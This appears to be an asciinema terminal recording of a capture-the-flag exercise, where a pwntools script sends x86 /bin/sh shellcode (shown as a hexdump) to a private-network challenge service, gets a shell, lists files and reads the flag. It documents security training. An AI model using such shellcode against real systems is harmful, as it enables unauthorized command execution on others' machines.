{"version": 2, "width": 120, "height": 30, "timestamp": 1752133687, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.877891, "o", "\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                                       \r \r"]
[0.880512, "o", "\u001b]2;root@chunk-core-1:/mnt/e/Projects/ctf101\u0007\u001b]1;..ojects/ctf101\u0007"]
[0.890103, "o", "\u001b]7;file://chunk-core-1/mnt/e/Projects/ctf101\u001b\\"]
[0.944803, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mctf101\u001b[00m \u001b[K"]
[0.945468, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[5.361286, "o", "asciinema rec pwn1-bn.cast "]
[5.371082, "o", "\u001b[27D\u001b[32ma\u001b[32ms\u001b[32mc\u001b[32mi\u001b[32mi\u001b[32mn\u001b[32me\u001b[32mm\u001b[32ma\u001b[39m\u001b[5C\u001b[4mp\u001b[4mw\u001b[4mn\u001b[4m1\u001b[4m-\u001b[4mb\u001b[4mn\u001b[4m.\u001b[4mc\u001b[4ma\u001b[4ms\u001b[4mt\u001b[24m\u001b[1C"]
[5.782702, "o", "\u001b[27D\u001b[32mp\u001b[32my\u001b[32mt\u001b[32mh\u001b[32mo\u001b[32mn\u001b[32m3\u001b[32m \u001b[32mp\u001b[39mwn1-b\u001b[4m.\u001b[4mp\u001b[4my\u001b[4m \u001b[24m\u001b[24m \u001b[24m \u001b[24m \u001b[24m \u001b[24m \u001b[24m \u001b[24m \u001b[24m \u001b[8D"]
[5.7931, "o", "\u001b[12D\u001b[32m3\u001b[39m\u001b[39m \u001b[39m\u001b[4mp\u001b[4mw\u001b[4mn\u001b[4m1\u001b[4m-\u001b[4mb\u001b[2C\u001b[4my\u001b[24m\u001b[24m "]
[5.970391, "o", "\u001b[?1l\u001b>"]
[5.970993, "o", "\u001b[?2004l"]
[5.979218, "o", "\r\r\n"]
[5.980483, "o", "\u001b]2;python3 pwn1-b.py\u0007\u001b]1;python3\u0007"]
[6.456936, "o", "[x] Opening connection to 10.214.160.13 on port 11003\r\n"]
[6.457717, "o", "\u001b[A[\u001b[1m\u001b[34m┤\u001b[m] \r\n"]
[6.470389, "o", "\u001b[5G\u001b[AOpening connection to 10.214.160.13 on port 11003: Trying 10.214.160.13\r\n"]
[6.475128, "o", "\u001b[5G\u001b[A\u001b[KOpening connection to 10.214.160.13 on port 11003: Done\r\n"]
[6.475823, "o", "\u001b[A[\u001b[1m\u001b[32m+\u001b[m] \r\n"]
[6.484054, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x5a bytes:\r\n"]
[6.484497, "o", "    b'Melody: Mom, I want a shell\\n'\r\n    b'Mom: This machine will run your input as assemble instruction\\n'\r\n"]
[6.484866, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Sent 0x24 bytes:\r\n"]
[6.488126, "o", "    00000000  31 \u001b[34mc0\u001b[m 50 68  2f 2f 73 68  68 2f 62 69  6e \u001b[34m89\u001b[m \u001b[34me3\u001b[m \u001b[34m89\u001b[m  │1\u001b[34m·\u001b[mPh\u001b[34m│\u001b[m//sh\u001b[34m│\u001b[mh/bi\u001b[34m│\u001b[mn\u001b[34m·\u001b[m\u001b[34m·\u001b[m\u001b[34m·\u001b[m│\r\n    00000010  \u001b[34mc1\u001b[m \u001b[34m89\u001b[m \u001b[34mc2\u001b[m \u001b[34mb0\u001b[m  \u001b[34m0b\u001b[m \u001b[34mcd\u001b[m \u001b[34m80\u001b[m 31  \u001b[34mc0\u001b[m 40 \u001b[34mcd\u001b[m \u001b[34m80\u001b[m  41 41 41 41  │\u001b[34m·\u001b[m\u001b[34m·\u001b[m\u001b[34m·\u001b[m\u001b[34m·\u001b[m\u001b[34m│\u001b[m\u001b[34m·\u001b[m\u001b[34m·\u001b[m\u001b[34m·\u001b[m1\u001b[34m│\u001b[m\u001b[34m·\u001b[m@\u001b[34m·\u001b[m\u001b[34m·\u001b[m\u001b[34m│\u001b[mAAAA│\r\n    00000020  41 41 41 \u001b[31m0a\u001b[m                                         │AAA\u001b[31m·\u001b[m│\r\n    00000024\r\n"]
[6.488762, "o", "[\u001b[1m\u001b[34m*\u001b[m] Switching to interactive mode\r\n"]
[6.48923, "o", "\r\n"]
[6.490284, "o", "\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\u001b[J"]
[6.491447, "o", "\u001b[?25l\u001b[?1h\u001b="]
[8.073982, "o", "\u001b[3Gl\u001b[7m \u001b[m\u001b[J"]
[8.168575, "o", "\u001b[3Gls\u001b[7m \u001b[m\u001b[J"]
[8.238942, "o", "\u001b[3G\u001b[Kls\r\n\u001b[J"]
[8.239316, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Sent 0x3 bytes:\r\n    b'ls\\n'\r\n"]
[8.240211, "o", "\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\u001b[J"]
[8.248816, "o", "\r\u001b[J[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x6f bytes:\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r"]
[8.249043, "o", "\u001b[J    b'bin\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[8.249544, "o", "\r\u001b[J    b'boot\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r"]
[8.249689, "o", "\u001b[J    b'data\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[8.251584, "o", "\r\u001b[J    b'dev\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r\u001b[J    b'etc\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r\u001b[J    b'fastboot\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r\u001b[J    b'home\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r\u001b[J    b'lib\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r\u001b[J    b'lost+found\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r\u001b[J    b'media\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r\u001b[J    b'mnt\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r\u001b[J    b'opt\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r"]
[8.251953, "o", "\u001b[J    b'proc\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[8.252852, "o", "\r\u001b[J    b'root\\n'\r\n"]
[8.253307, "o", "\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r\u001b[J    b'run\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r\u001b[J    b'run.sh\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r"]
[8.253981, "o", "\u001b[J    b'sbin\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r"]
[8.254404, "o", "\u001b[J    b'srv\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[8.254798, "o", "\r\u001b[J    b'sys\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r\u001b[J    b'tmp\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r\u001b[J    b'usr\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[8.254981, "o", "\r\u001b[J    b'var\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[8.255482, "o", "\r\u001b[Jbin\r\nboot\r\ndata\r\ndev\r\netc\r\nfastboot\r\nhome\r\nlib\r\nlost+found\r\nmedia\r\nmnt\r\nopt\r\nproc\r\nroot\r\nrun\r\nrun.sh\r\nsbin\r\nsrv\r\nsys\r\ntmp\r\nusr\r\nvar\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[9.322587, "o", "\u001b[3Gc\u001b[7m \u001b[m\u001b[J"]
[9.437431, "o", "\u001b[3Gca\u001b[7m \u001b[m\u001b[J"]
[9.580755, "o", "\u001b[3Gcat\u001b[7m \u001b[m\u001b[J"]
[9.667839, "o", "\u001b[3Gcat \u001b[7m \u001b[m\u001b[J"]
[10.19708, "o", "\u001b[3Gcat d\u001b[7m \u001b[m\u001b[J"]
[10.248848, "o", "\u001b[3Gcat da\u001b[7m \u001b[m\u001b[J"]
[10.463619, "o", "\u001b[3Gcat dat\u001b[7m \u001b[m\u001b[J"]
[10.552252, "o", "\u001b[3Gcat data\u001b[7m \u001b[m\u001b[J"]
[11.083088, "o", "\u001b[3Gcat data/\u001b[7m \u001b[m\u001b[J"]
[11.357292, "o", "\u001b[3Gcat data/f\u001b[7m \u001b[m\u001b[J"]
[11.508044, "o", "\u001b[3Gcat data/fl\u001b[7m \u001b[m\u001b[J"]
[11.592676, "o", "\u001b[3Gcat data/fla\u001b[7m \u001b[m\u001b[J"]
[11.88651, "o", "\u001b[3Gcat data/flag\u001b[7m \u001b[m\u001b[J"]
[12.051662, "o", "\u001b[3G\u001b[Kcat data/flag\r\n\u001b[J"]
[12.052342, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Sent 0xe bytes:\r\n"]
[12.052801, "o", "    b'cat data/flag\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\u001b[J"]
[12.060268, "o", "\r\u001b[J[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x29 bytes:\r\n"]
[12.06082, "o", "\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[12.061245, "o", "\r\u001b[J    b'AAA{lgm_is_a_big_turtle_qq_qun_386796080}'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r"]
[12.061679, "o", "\u001b[JAAA{lgm_is_a_big_turtle_qq_qun_386796080}\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[14.32351, "o", "\u001b[44G\u001b[K\r\n\u001b[J"]
[14.324065, "o", "[\u001b[1m\u001b[34m*\u001b[m] Interrupted\r\n"]
[14.347175, "o", "\u001b[?12l\u001b[?25h\u001b[?1l\u001b>"]
[14.347737, "o", "[\u001b[1m\u001b[34m*\u001b[m] Closed connection to 10.214.160.13 port 11003\r\n"]
[14.446709, "o", "\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                                       \r \r"]
[14.448578, "o", "\u001b]2;root@chunk-core-1:/mnt/e/Projects/ctf101\u0007\u001b]1;..ojects/ctf101\u0007"]
[14.456199, "o", "\u001b]7;file://chunk-core-1/mnt/e/Projects/ctf101\u001b\\"]
[14.493029, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mctf101\u001b[00m \u001b[K"]
[14.493741, "o", "\u001b[?1h\u001b="]
[14.494508, "o", "\u001b[?2004h"]
[15.357217, "o", "\u001b[?2004l\r\r\n"]
